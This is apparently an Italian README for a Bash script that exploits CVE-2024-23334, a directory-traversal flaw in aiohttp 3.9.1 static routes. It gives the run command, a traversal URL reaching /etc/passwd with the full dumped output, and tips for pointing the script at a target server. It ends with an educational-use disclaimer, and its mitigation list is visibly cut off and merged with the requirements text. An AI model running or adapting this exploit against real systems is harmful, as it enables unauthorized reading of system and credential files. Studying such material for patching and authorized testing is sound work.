
Script Bash per automatizzare gli attacchi di Local File Inclusion (LFI) sul server aiohttp versione 3.9.1.
Uno script Bash per automatizzare attacchi di Local File Inclusion (LFI) su server aiohttp vulnerabili, mirando specificamente a CVE-2024-23334. Questo exploit consente l'accesso non autorizzato a file arbitrari su sistemi che eseguono versioni affette di aiohttp con rotte statiche configurate in modo improprio.
La vulnerabilità CVE-2024-23334 colpisce il framework asincrono client/server HTTP aiohttp per Python e asyncio. Si manifesta quando aiohttp viene utilizzato come server web con rotte statiche, che possono creare vulnerabilità di directory traversal se configurate in modo errato. Ciò consente a un attaccante di accedere a file arbitrari sul sistema senza autorizzazione.
Mitigazioni per questa vulnerabilità includono:
follow_symlinks nella configurazione del server.curl: assicurati che curl sia installato sul tuo sistema, poiché viene utilizzato per effettuare richieste HTTP.Per eseguire lo script, esegui il seguente comando:
./lfi_aiohttp.sh -f /path/to/file/to/dump
Se tutto va bene, dovresti vedere un risultato simile a:
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
[+] File dumped successfully.
Importante: le variabili
main_urlepayloadnello script potrebbero dover essere modificate a seconda dell'ambiente target.
main_url: questa variabile deve essere impostata all'URL del server aiohttp target (ad es., http://localhost:8080). Modificala in base all'indirizzo del server reale contro cui stai effettuando i test.payload: questa variabile rappresenta la rotta dei file statici sul server (ad es., /assets/). Assicurati che questo percorso corrisponda alla configurazione della directory dei file statici del server target.Prima di eseguire lo script, controlla queste variabili per assicurarti che siano configurate correttamente per il tuo scenario di test. Impostazioni errate potrebbero causare tentativi di accesso falliti ai file o comportamenti indesiderati.
Questo script è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato di questo script è vietato e potrebbe essere illegale.